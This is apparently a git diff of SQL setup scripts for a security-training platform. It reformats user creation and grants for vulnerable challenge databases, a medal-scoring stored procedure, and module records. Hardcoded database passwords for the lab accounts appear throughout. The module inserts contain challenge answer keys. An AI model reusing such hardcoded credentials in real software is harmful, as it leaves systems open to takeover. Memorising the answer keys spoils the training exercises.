-.
-`bankAccounts`
-TO
-'theBankMan'@'localhost';
-GRANT
-UPDATE ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
-GRANT
-EXECUTE
-ON
-PROCEDURE
-`directObjectBank`
-.
-`bankAuth`
-TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`currentFunds` TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`transferFunds` TO
-'theBankMan'@'localhost';
-GRANT EXECUTE ON PROCEDURE `directObjectBank`.`createAccount` TO
-'theBankMan'@'localhost';
-
-GRANT USAGE ON *.* TO
-'procChalUser'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'procChalUser'@'localhost';
-CREATE
-USER 'procChalUser'@'localhost' IDENTIFIED BY 'k61dSmsM*8n';
-GRANT
-SELECT
-ON `SqlChalStoredProc`.`customers` TO 'procChalUser'@'localhost';
-GRANT
-EXECUTE
-ON
-PROCEDURE
-`SqlChalStoredProc`
-.
-`findUser`
-TO
-'procChalUser'@'localhost';
-
-GRANT USAGE ON *.* TO
-'imVideoingThis'@'localhost' IDENTIFIED BY 'password';
-DROP
-USER 'imVideoingThis'@'localhost';
-CREATE
-USER 'imVideoingThis'@'localhost' IDENTIFIED BY 'auoi@7723dj';
-GRANT
-SELECT
-ON `SqlPoorEscape`.`customers` TO 'imVideoingThis'@'localhost';
+GRANT USAGE ON *.* TO 'userLookUuuup'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'userLookUuuup'@'localhost';
+CREATE USER 'userLookUuuup'@'localhost' IDENTIFIED BY 'youMomaSoTh1n';
+GRANT SELECT ON `SqlChalSix`.`users` TO 'userLookUuuup'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTPubUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTPubUser'@'localhost';
+CREATE USER 'DnTPubUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTPubUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`coupons` TO 'DnTPubUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTVipUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTVipUser'@'localhost';
+CREATE USER 'DnTVipUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTVipUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`vipCoupons` TO 'DnTVipUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTPurUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTPurUser'@'localhost';
+CREATE USER 'DnTPurUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTPurUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`coupons` TO 'DnTPurUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`vipCoupons` TO 'DnTPurUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'firstBloodyMessL'@'localhost';
+CREATE USER 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'firstBlooded';
+GRANT SELECT ON `SqlInjLesson`.`tb_users` TO 'firstBloodyMessL'@'localhost';
+
+GRANT USAGE ON *.* TO 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'CharlieSeabrook'@'localhost';
+CREATE USER 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'shallowHal';
+GRANT SELECT ON `SqlChalEmail`.`customers` TO 'CharlieSeabrook'@'localhost';
+
+GRANT USAGE ON *.* TO 'RightGuard3d'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'RightGuard3d'@'localhost';
+CREATE USER 'RightGuard3d'@'localhost' IDENTIFIED BY 'logic3Speaker';
+GRANT SELECT ON `SqlChalOne`.`customers` TO 'RightGuard3d'@'localhost';
+
+GRANT USAGE ON *.* TO 'HdmiNoSignal'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'HdmiNoSignal'@'localhost';
+CREATE USER 'HdmiNoSignal'@'localhost' IDENTIFIED BY '1nforma1ion';
+GRANT SELECT ON `SqlChalThree`.`customers` TO 'HdmiNoSignal'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomUserName'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'randomUserName'@'localhost';
+CREATE USER 'randomUserName'@'localhost' IDENTIFIED BY 'c4utionHoT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
+
+GRANT USAGE ON *.* TO 'doveM3nCare'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'doveM3nCare'@'localhost';
+CREATE USER 'doveM3nCare'@'localhost' IDENTIFIED BY 'plusm0r3';
+GRANT SELECT ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
+
+GRANT USAGE ON *.* TO 'murr4yFe1ld'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'murr4yFe1ld'@'localhost';
+CREATE USER 'murr4yFe1ld'@'localhost' IDENTIFIED BY '4gainst3ngl4nd';
+GRANT SELECT ON `directObjectRefChalOne`.`users` TO 'murr4yFe1ld'@'localhost';
+
+GRANT USAGE ON *.* TO 'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'd3nn1sM4nely'@'localhost';
+CREATE USER 'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'Pr0ductM4rket1ngIssu3s';
+GRANT SELECT ON `directObjectRefChalTwo`.`users` TO 'd3nn1sM4nely'@'localhost';
+
+GRANT USAGE ON *.* TO 'secureDood'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'secureDood'@'localhost';
+CREATE USER 'secureDood'@'localhost' IDENTIFIED BY 'iCantEv3n';
+GRANT SELECT ON `SqlChalFourSuperSecure`.`users` TO 'secureDood'@'localhost';
+
+GRANT USAGE ON *.* TO 'csrfChalEnuer'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'csrfChalEnuer'@'localhost';
+CREATE USER 'csrfChalEnuer'@'localhost' IDENTIFIED BY 'c4n1bUplZ';
+GRANT SELECT ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+GRANT INSERT ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+GRANT UPDATE ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+
+GRANT USAGE ON *.* TO 'l3tsg0cra'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'l3tsg0cra'@'localhost';
+CREATE USER 'l3tsg0cra'@'localhost' IDENTIFIED BY '83ururMa';
+GRANT SELECT ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
+
+GRANT USAGE ON *.* TO 'csrfChalFour'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'csrfChalFour'@'localhost';
+CREATE USER 'csrfChalFour'@'localhost' IDENTIFIED BY 'R1n13U2pv';
+GRANT SELECT ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+GRANT INSERT ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+GRANT UPDATE ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomMoFoName'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'randomMoFoName'@'localhost';
+CREATE USER 'randomMoFoName'@'localhost' IDENTIFIED BY 'c2zXlq_ZoT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalSix`.`users` TO 'randomMoFoName'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomFlower'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'randomFlower'@'localhost';
+CREATE USER 'randomFlower'@'localhost' IDENTIFIED BY 'c21-le_6oT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalSeven`.`users` TO 'randomFlower'@'localhost';
+
+GRANT USAGE ON *.* TO 'tSwsfUSer'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'tSwsfUSer'@'localhost';
+CREATE USER 'tSwsfUSer'@'localhost' IDENTIFIED BY '9s31iusd-n';
+GRANT SELECT ON `CryptShop`.`items` TO 'tSwsfUSer'@'localhost';
+GRANT SELECT ON `CryptShop`.`coupons` TO 'tSwsfUSer'@'localhost';
+
+GRANT USAGE ON *.* TO 'yourOrEll'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'yourOrEll'@'localhost';
+CREATE USER 'yourOrEll'@'localhost' IDENTIFIED BY '91dj3:766f';
+GRANT SELECT ON `UrlAccessThree`.`users` TO 'yourOrEll'@'localhost';
+
+GRANT USAGE ON *.* TO 'r1ndomFlower'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'r1ndomFlower'@'localhost';
+CREATE USER 'r1ndomFlower'@'localhost' IDENTIFIED BY 'c41-l2_6oT';
+GRANT SELECT ON `sqlInjectSeven`.`users` TO 'r1ndomFlower'@'localhost';
+
+GRANT USAGE ON *.* TO 'al1th3Tokens'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'al1th3Tokens'@'localhost';
+CREATE USER 'al1th3Tokens'@'localhost' IDENTIFIED BY '87SDO63yUN.';
+GRANT SELECT ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
+GRANT INSERT ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
+GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`getToken` TO 'al1th3Tokens'@'localhost';
+GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`validToken` TO 'al1th3Tokens'@'localhost';
+
+GRANT USAGE ON *.* TO 'theBankMan'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'theBankMan'@'localhost';
+CREATE USER 'theBankMan'@'localhost' IDENTIFIED BY 'B4ndkm.M98n';
+GRANT SELECT ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT INSERT ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT UPDATE ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`bankAuth` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`currentFunds` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`transferFunds` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`createAccount` TO 'theBankMan'@'localhost';
+
+GRANT USAGE ON *.* TO 'procChalUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'procChalUser'@'localhost';
+CREATE USER 'procChalUser'@'localhost' IDENTIFIED BY 'k61dSmsM*8n';
+GRANT SELECT ON `SqlChalStoredProc`.`customers` TO 'procChalUser'@'localhost';
+GRANT EXECUTE ON PROCEDURE `SqlChalStoredProc`.`findUser` TO 'procChalUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'imVideoingThis'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'imVideoingThis'@'localhost';
+CREATE USER 'imVideoingThis'@'localhost' IDENTIFIED BY 'auoi@7723dj';
+GRANT SELECT ON `SqlPoorEscape`.`customers` TO 'imVideoingThis'@'localhost';
diff --git a/src/main/resources/database/updatev3_0tov3_1.sql b/src/main/resources/database/updatev3_0tov3_1.sql
index e247c6118..72742fe8c 100644
--- a/src/main/resources/database/updatev3_0tov3_1.sql
+++ b/src/main/resources/database/updatev3_0tov3_1.sql
@@ -1,67 +1,27 @@
-use
-`core`;
-
-
-CREATE TABLE IF NOT EXISTS `core`.`medals`
-(
- `medalId`
- INT
- NOT
- NULL
- AUTO_INCREMENT,
- `classId`
- VARCHAR
-(
- 64
-) NULL,
- `moduleId` VARCHAR
-(
- 64
-) NOT NULL,
- `scoreBonus` INT NOT NULL DEFAULT 5 ,
- `goldMedalAvailable` TINYINT
-(
- 1
-) NOT NULL DEFAULT TRUE,
- `silverMedalAvailable` TINYINT
-(
- 1
-) NOT NULL DEFAULT TRUE,
- `bronzeMedalAvailable` TINYINT
-(
- 1
-) NOT NULL DEFAULT TRUE,
- PRIMARY KEY
-(
- `medalId`
-) ,
- INDEX `fk_Medals_Modules1`
-(
- `moduleId` ASC
-) ,
- CONSTRAINT `fk_Medals_Class1`
- FOREIGN KEY
-(
- `classId`
-)
- REFERENCES `core`.`class`
-(
- `classId`
-)
+use `core`;
+
+
+CREATE TABLE IF NOT EXISTS `core`.`medals` (
+ `medalId` INT NOT NULL AUTO_INCREMENT,
+ `classId` VARCHAR(64) NULL,
+ `moduleId` VARCHAR(64) NOT NULL,
+ `scoreBonus` INT NOT NULL DEFAULT 5 ,
+ `goldMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ `silverMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ `bronzeMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ PRIMARY KEY (`medalId`) ,
+ INDEX `fk_Medals_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_Medals_Class1`
+ FOREIGN KEY (`classId` )
+ REFERENCES `core`.`class` (`classId` )
ON DELETE NO ACTION
ON UPDATE NO ACTION,
- CONSTRAINT `fk_Medals_Modules1`
- FOREIGN KEY
-(
- `moduleId`
-)
- REFERENCES `core`.`modules`
-(
- `moduleId`
-)
+ CONSTRAINT `fk_Medals_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `core`.`modules` (`moduleId` )
ON DELETE CASCADE
ON UPDATE CASCADE)
- ENGINE = InnoDB;
+ENGINE = InnoDB;
@@ -69,16 +29,14 @@ CREATE TABLE IF NOT EXISTS `core`.`medals`
-- procedure adminFindById
-- -----------------------------------------------------
-USE
-`core`;
+USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`adminFindById`(IN adminId VARCHAR (64))
+CREATE PROCEDURE `core`.`adminFindById` (IN adminId VARCHAR(64))
BEGIN
COMMIT;
-SELECT userName
-FROM users
-WHERE userId = adminId
- AND userRole = 'admin';
+SELECT userName FROM users
+ WHERE userId = adminId
+ AND userRole = 'admin';
END
-- $$
-- DELIMITER ;
@@ -87,16 +45,14 @@ END
-- -----------------------------------------------------
-- procedure adminGetAll
-- -----------------------------------------------------
-USE
-`core`;
+USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`adminGetAll`()
+CREATE PROCEDURE `core`.`adminGetAll` ()
BEGIN
COMMIT;
-SELECT userId, userName, userAddress
-FROM users
-WHERE userRole = 'admin'
-ORDER BY userName;
+SELECT userId, userName, userAddress FROM users
+ WHERE userRole = 'admin'
+ ORDER BY userName;
END
-- $$
-- DELIMITER ;
@@ -106,287 +62,164 @@ END
-- procedure userUpdateResult
-- -----------------------------------------------------
-USE
-`core`;
+USE `core`;
-- DELIMITER $$
DROP PROCEDURE `core`.`userUpdateResult`;
-- $$
-- DELIMITER ;
-USE
-`core`;
+USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userUpdateResult`(IN theModuleId VARCHAR (64), IN theUserId VARCHAR (64), IN theBefore INT,
- IN theAfter INT, IN theDifficulty INT, IN theAdditionalInfo LONGTEXT)
+CREATE PROCEDURE `core`.`userUpdateResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT, IN theAfter INT, IN theDifficulty INT, IN theAdditionalInfo LONGTEXT)
BEGIN
-DECLARE
-theDate TIMESTAMP;
-DECLARE
-theClassId VARCHAR(64);
-DECLARE
-theBonus INT;
-DECLARE
-totalScore INT;
-DECLARE
-medalInfo INT; -- Used to find out if there is a medal available
-DECLARE
-goldMedalInfo INT;
-DECLARE
-silverMedalInfo INT;
-DECLARE
-bronzeMedalInfo INT;
-DECLARE
-medalRow INT;
+DECLARE theDate TIMESTAMP;
+DECLARE theClassId VARCHAR(64);
+DECLARE theBonus INT;
+DECLARE totalScore INT;
+DECLARE medalInfo INT; -- Used to find out if there is a medal available
+DECLARE goldMedalInfo INT;
+DECLARE silverMedalInfo INT;
+DECLARE bronzeMedalInfo INT;
+DECLARE medalRow INT;
COMMIT;
-- Does this Module/class combo exist in the DB?
-SELECT classId
-FROM users
-WHERE userid = theUserId INTO theClassId;
-IF
-(theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId IS NULL INTO medalRow;
+SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
+IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId INTO medalRow;
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
END IF;
-IF
-(medalRow < 1) THEN
+IF (medalRow < 1) THEN
INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
END IF;
COMMIT;
-SELECT NOW()
-FROM DUAL INTO theDate;
+SELECT NOW() FROM DUAL
+ INTO theDate;
-- Get current bonus and decrement the bonus value
-SELECT 0
-FROM DUAL INTO totalScore;
+SELECT 0 FROM DUAL INTO totalScore;
-IF
-(theClassId IS NULL) THEN
-SELECT scoreBonus
-FROM medals
-WHERE moduleId = theModuleId
- AND classId IS NULL INTO theBonus;
+
+IF (theClassId IS NULL) THEN
+ SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
ELSE
-SELECT scoreBonus
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId INTO theBonus;
+ SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
END IF;
-IF
-(theBonus > 0) THEN
-SELECT (totalScore + theBonus)
-FROM DUAL INTO totalScore;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET scoreBonus = scoreBonus - 1
-WHERE moduleId = theModuleId
- AND classId IS NULL;
-ELSE
-UPDATE medals
-SET scoreBonus = scoreBonus - 1
-WHERE moduleId = theModuleId
- AND classId = theClassId;
+IF (theBonus > 0) THEN
+ SELECT (totalScore + theBonus) FROM DUAL
+ INTO totalScore;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
-END IF;
-COMMIT;
+
+ END IF;
+ COMMIT;
END IF;
-IF
-(theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
- AND classId IS NULL INTO medalInfo;
+IF (theClassId IS NULL) THEN
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) AND classId IS NULL INTO medalInfo;
ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId
- AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
END IF;
COMMIT;
-IF
-(medalInfo > 0) THEN
+IF (medalInfo > 0) THEN
IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND goldMedalAvailable = TRUE
- AND classId IS NULL INTO goldMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId
- AND goldMedalAvailable = TRUE INTO goldMedalInfo;
-END IF;
- IF
-(goldMedalInfo > 0) THEN
-UPDATE users
-SET goldMedalCount = goldMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET goldMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId IS NULL;
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND goldMedalAvailable = TRUE AND classId IS NULL INTO goldMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND goldMedalAvailable = TRUE INTO goldMedalInfo;
+ END IF;
+ IF (goldMedalInfo > 0) THEN
+ UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
-ELSE
-UPDATE medals
-SET goldMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId = theClassId;
-END IF;
-COMMIT;
-ELSE
+ ELSE
+ UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ ELSE
IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND silverMedalAvailable = TRUE
- AND classId IS NULL INTO silverMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId
- AND silverMedalAvailable = TRUE INTO silverMedalInfo;
-END IF;
- IF
-(silverMedalInfo > 0) THEN
-UPDATE users
-SET silverMedalCount = silverMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET silverMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId IS NULL;
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND silverMedalAvailable = TRUE AND classId IS NULL INTO silverMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND silverMedalAvailable = TRUE INTO silverMedalInfo;
+ END IF;
+ IF (silverMedalInfo > 0) THEN
+ UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
-ELSE
-UPDATE medals
-SET silverMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId = theClassId;
-END IF;
-COMMIT;
-ELSE
+ ELSE
+ UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ ELSE
IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND bronzeMedalAvailable = TRUE
- AND classId IS NULL INTO bronzeMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
- AND classId = theClassId
- AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
-END IF;
- IF
-(bronzeMedalInfo > 0) THEN
-UPDATE users
-SET bronzeMedalCount = bronzeMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET bronzeMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId IS NULL;
-ELSE
-UPDATE medals
-SET bronzeMedalAvailable = FALSE
-WHERE moduleId = theModuleId
- AND classId = theClassId;
-END IF;
-COMMIT;
-END IF;
-END IF;
-END IF;
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND bronzeMedalAvailable = TRUE AND classId IS NULL INTO bronzeMedalInfo;
+ ELSE
+ SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
+ END IF;
+ IF (bronzeMedalInfo > 0) THEN
+ UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
+ IF (theClassId IS NULL) THEN
+ UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+ ELSE
+ UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+ END IF;
+ COMMIT;
+ END IF;
+ END IF;
+ END IF;
END IF;
-- Get the Score value for the level
-SELECT (totalScore + scoreValue)
-FROM modules
-WHERE moduleId = theModuleId INTO totalScore;
+SELECT (totalScore + scoreValue) FROM modules
+ WHERE moduleId = theModuleId
+ INTO totalScore;
-- Update users score
-UPDATE users
-SET userScore = userScore + totalScore
-WHERE userId = theUserId;
+UPDATE users SET
+ userScore = userScore + totalScore
+ WHERE userId = theUserId;
COMMIT;
-- Update result row
-UPDATE results
-SET finishTime = theDate,
- `knowledgeBefore` = theBefore,
- `knowledgeAfter` = theAfter,
- `difficulty` = theDifficulty,
+UPDATE results SET
+ finishTime = theDate,
+ `knowledgeBefore` = theBefore,
+ `knowledgeAfter` = theAfter,
+ `difficulty` = theDifficulty,
`resultSubmission` = theAdditionalInfo
-WHERE startTime IS NOT NULL
- AND finishTime IS NULL
- AND userId = theUserId
- AND moduleId = theModuleId;
+ WHERE startTime IS NOT NULL
+ AND finishTime IS NULL
+ AND userId = theUserId
+ AND moduleId = theModuleId;
COMMIT;
-SELECT moduleName
-FROM modules
- JOIN results USING (moduleId)
-WHERE startTime IS NOT NULL
- AND finishTime IS NOT NULL
- AND userId = theUserId
- AND moduleId = theModuleId;
+SELECT moduleName FROM modules
+ JOIN results USING (moduleId)
+ WHERE startTime IS NOT NULL
+ AND finishTime IS NOT NULL
+ AND userId = theUserId
+ AND moduleId = theModuleId;
END
-- $$
-- DELIMITER ;
;
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`)
-VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson',
- 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input',
- 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50',
- 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`)
-VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2', 'challenge',
- 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts',
- '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`)
-VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1',
- 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry',
- '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`)
-VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key',
- 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D',
- '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson', 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input', 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50', 1);
